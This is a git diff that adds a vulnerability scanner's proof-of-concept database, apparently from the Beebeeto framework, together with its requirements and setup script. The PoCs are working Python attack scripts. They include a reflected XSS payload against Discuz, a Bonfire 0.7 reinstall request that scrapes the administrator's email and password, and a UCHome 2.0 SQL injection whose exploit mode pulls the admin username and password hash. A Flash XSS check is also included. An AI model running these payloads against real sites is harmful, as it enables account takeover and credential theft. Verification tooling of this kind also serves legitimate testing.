['http://www.wooyun.org/bugs/wooyun-2014-065930',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = \"/post.php?action=reply&fid=17&tid=1591&extra=&replysubmit=yes&infloat=yes&handlekey=,alert(/5294c4024a6f892da8a6af5abd1b3c36/)\"\r\n        keyword = \"5294c4024a6f892da8a6af5abd1b3c36\"\r\n        vul_url = args['options']['target'] + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + vul_url\r\n            print '[*] FileMD5 : ' + keyword\r\n        request = urllib2.Request(vul_url)\r\n        resp = urllib2.urlopen(request)\r\n        content = resp.read()\r\n        key = \"if(typeof messagehandle_,alert(/\"+keyword+\"/)\"\r\n        if key in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = vul_url\r\n            args['poc_ret']['payload'] = payload\r\n            return args\r\n        else:\r\n            args['success'] = False\r\n            return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "post.php\u4e2dhandlekey\u53d8\u91cf\u4f20\u5165global.func.php\u540e\u8fc7\u6ee4\u4e0d\u4e25,\u5bfc\u81f4\u53cd\u5c04XSS\u6f0f\u6d1e\u7684\u4ea7\u751f", "app_name": "Discuz", "id": "poc-2014-0009", "layer4_protocol": null}
+{"create_date": "2014-09-17 17:26:28", "name": "Bonfire 0.7 /install.php \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 4, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Bonfire,\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0005',\r\n            'name': 'Bonfire 0.7 /install.php \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC',\r\n            'author': '1024',\r\n            'create_date': '2014-08-01',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Bonfire', \r\n            'vul_version': ['0.7'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Bonfire', '\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e'],\r\n            'desc': '\u7531\u4e8einstall.php\u5b89\u88c5\u6587\u4ef6\u5bf9\u5df2\u5b89\u88c5\u7684\u7a0b\u5e8f\u8fdb\u884c\u68c0\u6d4b\u540e\u6ca1\u6709\u505a\u597d\u540e\u7eed\u5904\u7406\uff0c\u5bfc\u81f4\u6267\u884c/install/do_install\u7684\u65f6\u5019\u5f15\u53d1\u91cd\u5b89\u88c5\u800c\u66b4\u9732\u7ba1\u7406\u5458\u4fe1\u606f\u3002',\r\n            'references': ['http://www.mehmetince.net/ci-bonefire-reinstall-admin-account-vulnerability-analysis-exploit/',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + '/index.php/install/do_install'\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        try:\r\n            content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n        except Exception, e:\r\n            content = ''\r\n            args['success'] = False\r\n            return args\r\n\r\n        if content:\r\n            regular = re.findall('Your Email:\\s+<b>(.*?)</b><br/>\\s+Password:\\s+<b>(.*?)</b>', content)\r\n            if regular:\r\n                (username, password) = regular[0]\r\n                args['success'] = True\r\n                args['poc_ret']['vul_url'] = verify_url\r\n                args['poc_ret']['Username'] = username\r\n                args['poc_ret']['Password'] = password\r\n                return args\r\n            else:\r\n                args['success'] = False\r\n                return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "\u7531\u4e8einstall.php\u5b89\u88c5\u6587\u4ef6\u5bf9\u5df2\u5b89\u88c5\u7684\u7a0b\u5e8f\u8fdb\u884c\u68c0\u6d4b\u540e\u6ca1\u6709\u505a\u597d\u540e\u7eed\u5904\u7406\uff0c\u5bfc\u81f4\u6267\u884c/install/do_install\u7684\u65f6\u5019\u5f15\u53d1\u91cd\u5b89\u88c5\u800c\u66b4\u9732\u7ba1\u7406\u5458\u4fe1\u606f\u3002", "app_name": "Bonfire", "id": "poc-2014-0005", "layer4_protocol": null}
+{"create_date": "2014-09-17 16:49:20", "name": "UCHome 2.0 /source/cp_profile.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 0, "author": "win95", "rank": 6, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "UCenter Home,SQL,SQLinjection,SQL\u6ce8\u5165\u6f0f\u6d1ePOC", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0004',  # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'UCHome 2.0 /source/cp_profile.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',  # \u540d\u79f0\r\n            'author': 'windows95',  # \u4f5c\u8005\r\n            'create_date': '2014-08-05',  # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\u6240\u4f7f\u7528\u7684\u7b2c\u4e09\u5c42\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Discuz UCenter Home',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['2.0'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'SQL Injection',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['UCenter Home', 'sql', 'SQL\u6ce8\u5165\u6f0f\u6d1e'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'UCHOME \u4fee\u6539\u4e2a\u4eba\u8d44\u6599\u5904 info \u53c2\u6570\u672a\u7ecf\u8fc7\u8fc7\u6ee4\u5bfc\u81f4 SQL \u6ce8\u5165\u6f0f\u6d1e\u7684\u53d1\u751f\uff0c\u53ef\u4ee5\u83b7\u53d6\u7ba1\u7406\u5458\u7684\u8d26\u53f7\u5bc6\u7801\u3002',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://wooyun.org/bugs/wooyun-2014-069193',  # \u53c2\u8003\u94fe\u63a5\r\n                           ],\r\n        },\r\n    }\r\n\r\n    def _init_user_parser(self):  # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n        self.user_parser.add_option('-c','--cookie',\r\n                                    action='store', dest='cookie', type='string', default=None,\r\n                                    help='this poc need to login, so special cookie '\r\n                                         'for target must be included in http headers.')\r\n\r\n    @classmethod\r\n    def verify(cls, args):  # \u5b9e\u73b0\u9a8c\u8bc1\u6a21\u5f0f\u7684\u4e3b\u51fd\u6570\r\n        payload = 'name=&marry=1&friend%5Bmarry%5D=0&birthyear=1989&birthmonth=2&birthday=1&friend%5B' \\\r\n                  'birth%5D=0&blood=A&friend%5Bblood %5D=0&birthprovince=%C7%E0%BA%A3&birthcity=%B5%C' \\\r\n                  '2%C1%EE%B9%FE&friend%5Bbirthcity%5D=0&resideprovince=%C7%E0%BA%A3&residec ity=%B5%' \\\r\n                  'C2%C1%EE%B9%FE&friend%5Bresidecity%5D=0&profilesubmit=%B1%A3%B4%E6&formhash={hash}' \\\r\n                  '&info[0\\',0,(select (1) from mysql.user where 1%3d1 and (SELECT 1 FROM (select cou' \\\r\n                  'nt(*),concat(floor(rand(0)*2),(substring((Select (md5(56311223))),1,62))) a from i' \\\r\n                  'nformation_schema.tables group by a)b)))#]=aaa'\r\n\r\n        vul_url = '{url}/cp.php?ac=profile&op=info&ref'.format(url=args['options']['target'])\r\n        hash_url = '{url}/cp.php?ac=profile&op=base'.format(url=args['options']['target'])\r\n        match_hash = re.compile('name=\"formhash\" value=\"([\\d\\w]+)\"')\r\n\r\n        if args['options']['verbose']:  # \u662f\u5426\u9700\u8981\u8f93\u51fa\u8be6\u7ec6\u4fe1\u606f\r\n            print '[*] {url} - Getting formhash ...'.format(url=args['options']['target'])\r\n        request = urllib2.Request(hash_url, headers={'Cookie': args['options']['cookie']})  # \u8c03\u7528\u4f20\u5165\u7684cookie\r\n        response = urllib2.urlopen(request).read()\r\n        form_hash = match_hash.findall(response)\r\n        if not form_hash:\r\n            args['success'] = False\r\n            return args\r\n            raise Exception(\"Get the formhash fail!\")\r\n\r\n        if args['options']['verbose']:\r\n            print '[*] {url} - The formhash is {form_hash}'.format(url=args['options']['target'], form_hash=form_hash[0])\r\n            print '[*] {url} - Executing payload ...'.format(url=args['options']['target'])\r\n        request = urllib2.Request(url=vul_url, headers={'Cookie': args['options']['cookie']}, data=payload.format(hash=form_hash[0]))\r\n        response = urllib2.urlopen(request).read()\r\n        if '14c711768474fac3bf03094625bc1aeaa' in response:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = args['options']['target']\r\n            return args\r\n        else:\r\n            args['success'] = False\r\n            return args\r\n\r\n    @classmethod\r\n    def exploit(cls, args):  # \u5b9e\u73b0exploit\u6a21\u5f0f\u7684\u4e3b\u51fd\u6570\r\n        vul_url = '{url}/cp.php?ac=profile&op=info&ref'.format(url=args['options']['target'])\r\n        hash_url = '{url}/cp.php?ac=profile&op=base'.format(url=args['options']['target'])\r\n        match_hash = re.compile('name=\"formhash\" value=\"([\\d\\w]+)\"')\r\n\r\n        payload = 'name=&marry=1&friend%5Bmarry%5D=0&birthyear=1989&birthmonth=2&birthday=1&friend%5B' \\\r\n                  'birth%5D=0&blood=A&friend%5Bblood %5D=0&birthprovince=%C7%E0%BA%A3&birthcity=%B5%C' \\\r\n                  '2%C1%EE%B9%FE&friend%5Bbirthcity%5D=0&resideprovince=%C7%E0%BA%A3&residec ity=%B5%' \\\r\n                  'C2%C1%EE%B9%FE&friend%5Bresidecity%5D=0&profilesubmit=%B1%A3%B4%E6&formhash={hash}' \\\r\n                  '&info[0\\',0,(select (1) from mysql.user where 1%3d1 and (SELECT 1 FROM (select cou' \\\r\n                  'nt(*),concat(floor(rand(0)*2),(substring((Select (select concat(username,0x3a3a,pa' \\\r\n                  'ssword) from uchome_member limit 0,1)),1,62))) a from information_schema.tables gr' \\\r\n                  'oup by a)b)))#]=aaa'\r\n        if args['options']['verbose']:\r\n            print '[*] {url} - Getting formhash ...'.format(url=args['options']['target'])\r\n        request = urllib2.Request(hash_url, headers={'Cookie': args['options']['cookie']})\r\n        response = urllib2.urlopen(request).read()\r\n        form_hash = match_hash.findall(response)\r\n        if not form_hash:\r\n            args['success'] = False\r\n            return args\r\n            raise Exception(\"Get the formhash fail!\")\r\n        if verbose:\r\n            print '[*] {url} - The formhash is {form_hash}'.format(url=args['options']['target'], form_hash=form_hash[0])\r\n            print '[*] {url} - Executing payload ...'.format(url=args['options']['target'])\r\n        request = urllib2.Request(url=vul_url, headers={'Cookie': args['options']['cookie']}, data=payload.format(hash=form_hash[0]))\r\n        response = urllib2.urlopen(request).read()\r\n        match_data = re.compile('entry \\'1(.*)::([\\w\\d]{32})\\' for')\r\n        data = match_data.findall(response)\r\n\r\n        if data:\r\n            args['success'] = True\r\n            args['poc_ret']['username'] = data[0][0]\r\n            args['poc_ret']['password'] = data[0][1]\r\n            return args\r\n        else:\r\n            args['success'] = False\r\n            return args\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "UCHOME \u4fee\u6539\u4e2a\u4eba\u8d44\u6599\u5904 info \u53c2\u6570\u672a\u7ecf\u8fc7\u8fc7\u6ee4\u5bfc\u81f4 SQL \u6ce8\u5165\u6f0f\u6d1e\u7684\u53d1\u751f\uff0c\u53ef\u4ee5\u83b7\u53d6\u7ba1\u7406\u5458\u7684\u8d26\u53f7\u5bc6\u7801\u3002", "app_name": "Discuz", "id": "poc-2014-0004", "layer4_protocol": null}
+{"create_date": "2014-09-17 15:56:07", "name": "Discuz x3.0 /static/image/common/focus.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 4, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Discuz,XSS,Flash XSS", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0001',\r\n            'name': 'Discuz x3.0 /static/image/common/focus.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': '1024',\r\n            'create_date': '2014-08-01',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Discuz', \r\n            'vul_version': ['x3.0'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['Discuz!', 'xss', 'flash xss'],\r\n            'desc': 'DiscuzX3.0 static/image/common/focus.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002',\r\n            'references': ['http://www.ipuman.com/pm6/137/',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        flash_md5 = \"c16a7c6143f098472e52dd13de85527f\"\r\n        file_path = \"/static/image/common/focus.swf\"\r\n        verify_url = args['options']['target'] + file_path\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        request = urllib2.Request(verify_url)\r\n        response = urllib2.urlopen(request)\r\n        content = response.read()\r\n        md5_value = md5.new(content).hexdigest()\r\n        if md5_value in flash_md5:\r\n            args['success'] = True\r\n            args['poc_ret']['xss_url'] = verify_url\r\n            return args\r\n        else:\r\n            args['success'] = False\r\n            return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "\u6b64\u6f0f\u6d1e\u51fa\u73b0\u5728\uff1aDiscuz_X3.0_SC_GBK \\upload\\static\\image\\common\\focus.swf", "app_name": "Discuz", "id": "poc-2014-0001", "layer4_protocol": null}
diff --git a/requirements.txt b/requirements.txt
new file mode 100755
index 0000000..4355ff6
--- /dev/null
+++ b/requirements.txt
@@ -0,0 +1,6 @@
+gevent
+colorama
+pyparsing
+threadpool
+pyreadline
+prettytable
diff --git a/setup.py b/setup.py
new file mode 100755
index 0000000..37d62a9
--- /dev/null
+++ b/setup.py
@@ -0,0 +1,74 @@
+#!/usr/bin/env python
+# coding: utf-8
+# site  : www.beebeeto.com
+# team  : n0tr00t security
+
+import os
+import sys
+import platform
+try:
+    import threadpool as tp
+    from lib.io import bprintPrefix
+except ImportError as err:
+    print str(err)
+
+def TestPlatform():
+    plat = platform.platform()
+    platstr = 'other'
+    if 'windows' in str(plat).lower():
+        platstr = 'windows'
+    return plat, platstr
+
+def Framework_check():
+    plat, platstr = TestPlatform()
+    if platstr == 'windows':
+        framework_path = '%s\\Beebeeto-framework\\' % ('\\'.join(os.getcwd().split('\\')[:-1]))
+    else:
+        framework_path = '%s/Beebeeto-framework/' % ('/'.join(os.getcwd().split('/')[:-1]))
+    if os.path.exists(framework_path) == True:
+        return True
+    else:
+        return False
+
+def Requirements():
+    requirements = []
+    [requirements.append(r.strip()) for r in open('requirements.txt', 'r').readlines()]
+    return requirements
+
+def Install(name, pip_proxy=False):
+    print
+    pip_proxy_address = 'http://mirrors.aliyun.com/pypi/simple/'
+    pip_proxy_host = 'mirrors.aliyun.com'
+    bprintPrefix('%s installing...' % name, 'ok')
+    if pip_proxy == True:
+        os.system('pip install %s -i %s --trusted-host %s' % (name, pip_proxy_address, pip_proxy_host))
+    else:
+        os.system('pip install %s' % name)
+
+def Main(pip_proxy):
+    try:
+        bprintPrefix('pip version: %s' % (os.popen('pip --version').readlines()[0].strip()), 'info')
+    except Exception as err:
+        bprintPrefix(str(err), 'error')
+        sys.exit()
+    requirements = Requirements()
+    plat, platstr = TestPlatform()
+    if platstr == 'windows':
+        requirements.remove('gevent')
+    else:
+        requirements.append('readline')
+    bprintPrefix('Platform: %s' % plat, 'info')
+    if Framework_check() == True:
+        bprintPrefix('Beebeeto-framework check: ok', 'ok')
+    else:
+        bprintPrefix('Beebeeto-framework check: false', 'error')
+        bprintPrefix('Installing...', 'info')
+        os.system('cd .. & git clone https://github.com/n0tr00t/Beebeeto-framework')
+    [Install(r, pip_proxy) for r in requirements]
+    bprintPrefix('Finish :)', 'ok')
+
+if __name__ == '__main__':
+    pip_proxy= False
+    if len(sys.argv) > 1 and sys.argv[1] == 'proxy':
+        pip_proxy = True
+    Main(pip_proxy)